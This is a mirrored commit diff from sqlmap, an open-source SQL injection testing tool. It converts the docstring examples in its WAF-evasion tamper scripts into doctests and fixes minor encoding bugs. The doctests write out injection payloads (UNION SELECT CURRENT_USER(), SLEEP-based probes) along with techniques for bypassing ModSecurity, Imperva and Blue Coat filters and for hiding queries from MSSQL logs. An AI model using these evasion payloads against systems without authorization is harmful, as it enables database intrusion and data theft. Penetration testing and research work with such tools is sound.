mirror of
				https://github.com/sqlmapproject/sqlmap.git
				synced 2025-10-25 13:11:00 +03:00 
			
		
		
		
	Another update for an Issue #352 and couple of fixes
This commit is contained in:
		
							parent
							
								
									b35122a42c
								
							
						
					
					
						commit
						4cb378ce3e
					
				|  | @ -736,7 +736,7 @@ def singleTimeLogMessage(message, level=logging.INFO, flag=None): | ||||||
|     if flag is None: |     if flag is None: | ||||||
|         flag = hash(message) |         flag = hash(message) | ||||||
| 
 | 
 | ||||||
|     if flag not in kb.singleLogFlags: |     if not conf.smokeTest and flag not in kb.singleLogFlags: | ||||||
|         kb.singleLogFlags.add(flag) |         kb.singleLogFlags.add(flag) | ||||||
|         logger.log(level, message) |         logger.log(level, message) | ||||||
| 
 | 
 | ||||||
|  |  | ||||||
|  | @ -41,8 +41,9 @@ failedTraceBack = None | ||||||
| 
 | 
 | ||||||
| def smokeTest(): | def smokeTest(): | ||||||
|     """ |     """ | ||||||
|     This will run the basic smoke testing of a program |     Runs the basic smoke testing of a program | ||||||
|     """ |     """ | ||||||
|  | 
 | ||||||
|     retVal = True |     retVal = True | ||||||
|     count, length = 0, 0 |     count, length = 0, 0 | ||||||
| 
 | 
 | ||||||
|  | @ -106,8 +107,9 @@ def adjustValueType(tagName, value): | ||||||
| 
 | 
 | ||||||
| def liveTest(): | def liveTest(): | ||||||
|     """ |     """ | ||||||
|     This will run the test of a program against the live testing environment |     Runs the test of a program against the live testing environment | ||||||
|     """ |     """ | ||||||
|  | 
 | ||||||
|     global failedItem |     global failedItem | ||||||
|     global failedParseOn |     global failedParseOn | ||||||
|     global failedTraceBack |     global failedTraceBack | ||||||
|  |  | ||||||
|  | @ -16,15 +16,14 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces apostrophe character with its UTF-8 full width counterpart |     Replaces apostrophe character with its UTF-8 full width counterpart | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: AND '1'='1' |  | ||||||
|         * Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87 |  | ||||||
| 
 |  | ||||||
|     References: |     References: | ||||||
|         * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 |         * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 | ||||||
|         * http://lukasz.pilorz.net/testy/unicode_conversion/ |         * http://lukasz.pilorz.net/testy/unicode_conversion/ | ||||||
|         * http://sla.ckers.org/forum/read.php?13,11562,11850 |         * http://sla.ckers.org/forum/read.php?13,11562,11850 | ||||||
|         * http://lukasz.pilorz.net/testy/full_width_utf/index.phps |         * http://lukasz.pilorz.net/testy/full_width_utf/index.phps | ||||||
|  | 
 | ||||||
|  |     >>> tamper("1 AND '1'='1") | ||||||
|  |     '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     return payload.replace('\'', "%EF%BC%87") if payload else payload |     return payload.replace('\'', "%EF%BC%87") if payload else payload | ||||||
|  |  | ||||||
|  | @ -16,9 +16,8 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces apostrophe character with its illegal double unicode counterpart |     Replaces apostrophe character with its illegal double unicode counterpart | ||||||
| 
 | 
 | ||||||
|     Example: |     >>> tamper("1 AND '1'='1") | ||||||
|         * Input: AND '1'='1' |     '1 AND %00%271%00%27=%00%271' | ||||||
|         * Output: AND %00%271%00%27=%00%271%00%27 |  | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     return payload.replace('\'', "%00%27") if payload else payload |     return payload.replace('\'', "%00%27") if payload else payload | ||||||
|  |  | ||||||
|  | @ -16,10 +16,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Appends encoded NULL byte character at the end of payload |     Appends encoded NULL byte character at the end of payload | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: AND 1=1 |  | ||||||
|         * Output: AND 1=1%00 |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * Microsoft Access |         * Microsoft Access | ||||||
| 
 | 
 | ||||||
|  | @ -29,6 +25,9 @@ def tamper(payload, **kwargs): | ||||||
|           also possible |           also possible | ||||||
| 
 | 
 | ||||||
|     Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection |     Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 AND 1=1') | ||||||
|  |     '1 AND 1=1%00' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     return "%s%%00" % payload if payload else payload |     return "%s%%00" % payload if payload else payload | ||||||
|  |  | ||||||
|  | @ -18,9 +18,8 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Base64 all characters in a given payload |     Base64 all characters in a given payload | ||||||
| 
 | 
 | ||||||
|     Example: |     >>> tamper("1' AND SLEEP(5)#") | ||||||
|         * Input: 1' AND SLEEP(5)# |     'MScgQU5EIFNMRUVQKDUpIw==' | ||||||
|         * Output: MScgQU5EIFNMRUVQKDUpIw== |  | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     return base64.b64encode(payload) if payload else payload |     return base64.b64encode(payload) if payload else payload | ||||||
|  |  | ||||||
|  | @ -18,10 +18,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' |     Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 'A > B' |  | ||||||
|         * Output: 'A NOT BETWEEN 0 AND B' |  | ||||||
| 
 |  | ||||||
|     Tested against: |     Tested against: | ||||||
|         * Microsoft SQL Server 2005 |         * Microsoft SQL Server 2005 | ||||||
|         * MySQL 4, 5.0 and 5.5 |         * MySQL 4, 5.0 and 5.5 | ||||||
|  | @ -33,6 +29,9 @@ def tamper(payload, **kwargs): | ||||||
|           filter the greater than character |           filter the greater than character | ||||||
|         * The BETWEEN clause is SQL standard. Hence, this tamper script |         * The BETWEEN clause is SQL standard. Hence, this tamper script | ||||||
|           should work against all (?) databases |           should work against all (?) databases | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 AND A > B--') | ||||||
|  |     '1 AND A NOT BETWEEN 0 AND B--' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -19,10 +19,6 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character after SQL statement with a valid random blank character. |     Replaces space character after SQL statement with a valid random blank character. | ||||||
|     Afterwards replace character = with LIKE operator |     Afterwards replace character = with LIKE operator | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT id FROM users where id = 1 |  | ||||||
|         * Output: SELECT%09id FROM users where id LIKE 1 |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * Blue Coat SGOS with WAF activated as documented in |         * Blue Coat SGOS with WAF activated as documented in | ||||||
|         https://kb.bluecoat.com/index?page=content&id=FAQ2147 |         https://kb.bluecoat.com/index?page=content&id=FAQ2147 | ||||||
|  | @ -32,12 +28,15 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass Blue Coat's recommended WAF rule configuration |         * Useful to bypass Blue Coat's recommended WAF rule configuration | ||||||
|  | 
 | ||||||
|  |     >>> tamper('SELECT id FROM users where id = 1') | ||||||
|  |     'SELECT%09id FROM users where id LIKE 1' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
| 
 | 
 | ||||||
|     if payload: |     if payload: | ||||||
|         retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>\t", payload) |         retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>%09", payload) | ||||||
|         retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) |         retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) | ||||||
| 
 | 
 | ||||||
|     return retVal |     return retVal | ||||||
|  |  | ||||||
|  | @ -19,14 +19,13 @@ def tamper(payload, **kwargs): | ||||||
|     Double url-encodes all characters in a given payload (not processing |     Double url-encodes all characters in a given payload (not processing | ||||||
|     already encoded) |     already encoded) | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT FIELD FROM%20TABLE |  | ||||||
|         * Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545 |  | ||||||
| 
 |  | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass some weak web application firewalls that do not |         * Useful to bypass some weak web application firewalls that do not | ||||||
|           double url-decode the request before processing it through their |           double url-decode the request before processing it through their | ||||||
|           ruleset |           ruleset | ||||||
|  | 
 | ||||||
|  |     >>> tamper('SELECT FIELD FROM%20TABLE') | ||||||
|  |     '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  | @ -37,7 +36,7 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|         while i < len(payload): |         while i < len(payload): | ||||||
|             if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: |             if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: | ||||||
|                 retVal += payload[i:i + 3] |                 retVal += '%%25%s' % payload[i + 1:i + 3] | ||||||
|                 i += 3 |                 i += 3 | ||||||
|             else: |             else: | ||||||
|                 retVal += '%%25%.2X' % ord(payload[i]) |                 retVal += '%%25%.2X' % ord(payload[i]) | ||||||
|  |  | ||||||
|  | @ -19,10 +19,6 @@ def tamper(payload, **kwargs): | ||||||
|     Url-encodes all characters in a given payload (not processing already |     Url-encodes all characters in a given payload (not processing already | ||||||
|     encoded) |     encoded) | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT FIELD FROM%20TABLE |  | ||||||
|         * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45 |  | ||||||
| 
 |  | ||||||
|     Tested against: |     Tested against: | ||||||
|         * Microsoft SQL Server 2005 |         * Microsoft SQL Server 2005 | ||||||
|         * MySQL 4, 5.0 and 5.5 |         * MySQL 4, 5.0 and 5.5 | ||||||
|  | @ -34,6 +30,9 @@ def tamper(payload, **kwargs): | ||||||
|           url-decode the request before processing it through their ruleset |           url-decode the request before processing it through their ruleset | ||||||
|         * The web server will anyway pass the url-decoded version behind, |         * The web server will anyway pass the url-decoded version behind, | ||||||
|           hence it should work against any DBMS |           hence it should work against any DBMS | ||||||
|  | 
 | ||||||
|  |     >>> tamper('SELECT FIELD FROM%20TABLE') | ||||||
|  |     '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -21,10 +21,6 @@ def tamper(payload, **kwargs): | ||||||
|     Unicode-url-encodes non-encoded characters in a given payload (not |     Unicode-url-encodes non-encoded characters in a given payload (not | ||||||
|     processing already encoded) |     processing already encoded) | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT FIELD%20FROM TABLE |  | ||||||
|         * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045' |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * ASP |         * ASP | ||||||
|         * ASP.NET |         * ASP.NET | ||||||
|  | @ -39,6 +35,9 @@ def tamper(payload, **kwargs): | ||||||
|         * Useful to bypass weak web application firewalls that do not |         * Useful to bypass weak web application firewalls that do not | ||||||
|           unicode url-decode the request before processing it through their |           unicode url-decode the request before processing it through their | ||||||
|           ruleset |           ruleset | ||||||
|  | 
 | ||||||
|  |     >>> tamper('SELECT FIELD%20FROM TABLE') | ||||||
|  |     '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -21,10 +21,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces all occurances of operator equal ('=') with operator 'LIKE' |     Replaces all occurances of operator equal ('=') with operator 'LIKE' | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT * FROM users WHERE id=1 |  | ||||||
|         * Output: SELECT * FROM users WHERE id LIKE 1 |  | ||||||
| 
 |  | ||||||
|     Tested against: |     Tested against: | ||||||
|         * Microsoft SQL Server 2005 |         * Microsoft SQL Server 2005 | ||||||
|         * MySQL 4, 5.0 and 5.5 |         * MySQL 4, 5.0 and 5.5 | ||||||
|  | @ -34,6 +30,9 @@ def tamper(payload, **kwargs): | ||||||
|           filter the equal character ('=') |           filter the equal character ('=') | ||||||
|         * The LIKE operator is SQL standard. Hence, this tamper script |         * The LIKE operator is SQL standard. Hence, this tamper script | ||||||
|           should work against all (?) databases |           should work against all (?) databases | ||||||
|  | 
 | ||||||
|  |     >>> tamper('SELECT * FROM users WHERE id=1') | ||||||
|  |     'SELECT * FROM users WHERE id LIKE 1' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     def process(match): |     def process(match): | ||||||
|  |  | ||||||
|  | @ -18,10 +18,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces greater than operator ('>') with 'GREATEST' counterpart |     Replaces greater than operator ('>') with 'GREATEST' counterpart | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 'A > B' |  | ||||||
|         * Output: 'GREATEST(A, B + 1) = A' |  | ||||||
| 
 |  | ||||||
|     Tested against: |     Tested against: | ||||||
|         * MySQL 4, 5.0 and 5.5 |         * MySQL 4, 5.0 and 5.5 | ||||||
|         * Oracle 10g |         * Oracle 10g | ||||||
|  | @ -32,6 +28,9 @@ def tamper(payload, **kwargs): | ||||||
|           filter the greater than character |           filter the greater than character | ||||||
|         * The GREATEST clause is a widespread SQL command. Hence, this |         * The GREATEST clause is a widespread SQL command. Hence, this | ||||||
|           tamper script should work against majority of databases |           tamper script should work against majority of databases | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 AND A > B') | ||||||
|  |     '1 AND GREATEST(A,B+1)=A' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -23,10 +23,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Adds versioned MySQL comment before each keyword |     Adds versioned MySQL comment before each keyword | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa |  | ||||||
|         * Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL < 5.1 |         * MySQL < 5.1 | ||||||
| 
 | 
 | ||||||
|  | @ -38,6 +34,9 @@ def tamper(payload, **kwargs): | ||||||
|           back-end database management system is MySQL |           back-end database management system is MySQL | ||||||
|         * Used during the ModSecurity SQL injection challenge, |         * Used during the ModSecurity SQL injection challenge, | ||||||
|           http://modsecurity.org/demo/challenge.html |           http://modsecurity.org/demo/challenge.html | ||||||
|  | 
 | ||||||
|  |     >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") | ||||||
|  |     "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     def process(match): |     def process(match): | ||||||
|  |  | ||||||
|  | @ -16,10 +16,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' |     Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: IFNULL(1, 2) |  | ||||||
|         * Output: IF(ISNULL(1), 2, 1) |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL |         * MySQL | ||||||
|         * SQLite (possibly) |         * SQLite (possibly) | ||||||
|  | @ -31,6 +27,9 @@ def tamper(payload, **kwargs): | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass very weak and bespoke web application firewalls |         * Useful to bypass very weak and bespoke web application firewalls | ||||||
|           that filter the IFNULL() function |           that filter the IFNULL() function | ||||||
|  | 
 | ||||||
|  |     >>> tamper('IFNULL(1, 2)') | ||||||
|  |     'IF(ISNULL(1),2,1)' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     if payload and payload.find("IFNULL") > -1: |     if payload and payload.find("IFNULL") > -1: | ||||||
|  | @ -55,7 +54,7 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|             if comma and end: |             if comma and end: | ||||||
|                 _ = payload[index + len("IFNULL("):comma] |                 _ = payload[index + len("IFNULL("):comma] | ||||||
|                 __ = payload[comma + 1:end] |                 __ = payload[comma + 1:end].lstrip() | ||||||
|                 newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _) |                 newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _) | ||||||
|                 payload = payload[:index] + newVal + payload[end + 1:] |                 payload = payload[:index] + newVal + payload[end + 1:] | ||||||
|             else: |             else: | ||||||
|  |  | ||||||
|  | @ -17,10 +17,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Embraces complete query with versioned comment |     Embraces complete query with versioned comment | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 AND 2>1-- |  | ||||||
|         * Output: 1 /*!30000AND 2>1*/-- |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL |         * MySQL | ||||||
| 
 | 
 | ||||||
|  | @ -29,6 +25,11 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass ModSecurity WAF/IDS |         * Useful to bypass ModSecurity WAF/IDS | ||||||
|  | 
 | ||||||
|  |     >>> import random | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('1 AND 2>1--') | ||||||
|  |     '1 /*!30874AND 2>1*/--' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -16,10 +16,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Embraces complete query with zero-versioned comment |     Embraces complete query with zero-versioned comment | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 AND 2>1-- |  | ||||||
|         * Output: 1 /*!00000AND 2>1*/-- |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL |         * MySQL | ||||||
| 
 | 
 | ||||||
|  | @ -28,6 +24,9 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass ModSecurity WAF/IDS |         * Useful to bypass ModSecurity WAF/IDS | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 AND 2>1--') | ||||||
|  |     '1 /*!00000AND 2>1*/--' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -20,15 +20,15 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Adds multiple spaces around SQL keywords |     Adds multiple spaces around SQL keywords | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: UNION SELECT |  | ||||||
|         * Output:  UNION   SELECT |  | ||||||
| 
 |  | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass very weak and bespoke web application firewalls |         * Useful to bypass very weak and bespoke web application firewalls | ||||||
|           that has poorly written permissive regular expressions |           that has poorly written permissive regular expressions | ||||||
| 
 | 
 | ||||||
|     Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt |     Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt | ||||||
|  | 
 | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('1 UNION SELECT foobar') | ||||||
|  |     '1    UNION     SELECT   foobar' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -18,12 +18,12 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces predefined SQL keywords with representations |     Replaces predefined SQL keywords with representations | ||||||
|     suitable for replacement (e.g. .replace("SELECT", "")) filters |     suitable for replacement (e.g. .replace("SELECT", "")) filters | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 UNION SELECT 2-- |  | ||||||
|         * Output: 1 UNUNIONION SELSELECTECT 2-- |  | ||||||
| 
 |  | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass very weak custom filters |         * Useful to bypass very weak custom filters | ||||||
|  | 
 | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('1 UNION SELECT 2--') | ||||||
|  |     '1 UNIOUNIONN SELESELECTCT 2--' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE") |     keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE") | ||||||
|  |  | ||||||
|  | @ -20,10 +20,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Adds a percentage sign ('%') infront of each character |     Adds a percentage sign ('%') infront of each character | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT FIELD FROM TABLE |  | ||||||
|         * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * ASP |         * ASP | ||||||
| 
 | 
 | ||||||
|  | @ -34,6 +30,9 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass weak and bespoke web application firewalls |         * Useful to bypass weak and bespoke web application firewalls | ||||||
|  | 
 | ||||||
|  |     >>> tamper('SELECT FIELD FROM TABLE') | ||||||
|  |     '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     if payload: |     if payload: | ||||||
|  |  | ||||||
|  | @ -20,10 +20,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces each keyword character with random case value |     Replaces each keyword character with random case value | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: INSERT |  | ||||||
|         * Output: InsERt |  | ||||||
| 
 |  | ||||||
|     Tested against: |     Tested against: | ||||||
|         * Microsoft SQL Server 2005 |         * Microsoft SQL Server 2005 | ||||||
|         * MySQL 4, 5.0 and 5.5 |         * MySQL 4, 5.0 and 5.5 | ||||||
|  | @ -34,6 +30,11 @@ def tamper(payload, **kwargs): | ||||||
|         * Useful to bypass very weak and bespoke web application firewalls |         * Useful to bypass very weak and bespoke web application firewalls | ||||||
|           that has poorly written permissive regular expressions |           that has poorly written permissive regular expressions | ||||||
|         * This tamper script should work against all (?) databases |         * This tamper script should work against all (?) databases | ||||||
|  | 
 | ||||||
|  |     >>> import random | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('INSERT') | ||||||
|  |     'INseRt' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -16,7 +16,11 @@ __priority__ = PRIORITY.LOW | ||||||
| def tamper(payload, **kwargs): | def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Add random comments to SQL keywords |     Add random comments to SQL keywords | ||||||
|     Example: 'INSERT' becomes 'IN/**/S/**/ERT' | 
 | ||||||
|  |     >>> import random | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('INSERT') | ||||||
|  |     'I/**/N/**/SERT' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -16,13 +16,12 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Appends special crafted string |     Appends special crafted string | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: AND 1=1 |  | ||||||
|         * Output: AND 1=1 and '0having'='0having' |  | ||||||
| 
 |  | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful for bypassing Imperva SecureSphere WAF |         * Useful for bypassing Imperva SecureSphere WAF | ||||||
|         * Reference: http://seclists.org/fulldisclosure/2011/May/163 |         * Reference: http://seclists.org/fulldisclosure/2011/May/163 | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 AND 1=1') | ||||||
|  |     "1 AND 1=1 and '0having'='0having'" | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     return payload + " and '0having'='0having'" if payload else payload |     return payload + " and '0having'='0having'" if payload else payload | ||||||
|  |  | ||||||
|  | @ -13,16 +13,15 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs |     Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 AND 9227=9227-- |  | ||||||
|         * Output: 1 AND 9227=9227--sp_password |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MSSQL |         * MSSQL | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure |         * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure | ||||||
|         * Reference: http://websec.ca/kb/sql_injection |         * Reference: http://websec.ca/kb/sql_injection | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 AND 9227=9227-- ') | ||||||
|  |     '1 AND 9227=9227-- sp_password' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = "" |     retVal = "" | ||||||
|  |  | ||||||
|  | @ -16,10 +16,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces space character (' ') with comments '/**/' |     Replaces space character (' ') with comments '/**/' | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT id FROM users |  | ||||||
|         * Output: SELECT/**/id/**/FROM/**/users |  | ||||||
| 
 |  | ||||||
|     Tested against: |     Tested against: | ||||||
|         * Microsoft SQL Server 2005 |         * Microsoft SQL Server 2005 | ||||||
|         * MySQL 4, 5.0 and 5.5 |         * MySQL 4, 5.0 and 5.5 | ||||||
|  | @ -28,6 +24,9 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass weak and bespoke web application firewalls |         * Useful to bypass weak and bespoke web application firewalls | ||||||
|  | 
 | ||||||
|  |     >>> tamper('SELECT id FROM users') | ||||||
|  |     'SELECT/**/id/**/FROM/**/users' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -17,20 +17,18 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character (' ') with a dash comment ('--') followed by |     Replaces space character (' ') with a dash comment ('--') followed by | ||||||
|     a random string and a new line ('\n') |     a random string and a new line ('\n') | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 AND 9227=9227 |  | ||||||
|         * Output: 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227 |  | ||||||
| 
 |  | ||||||
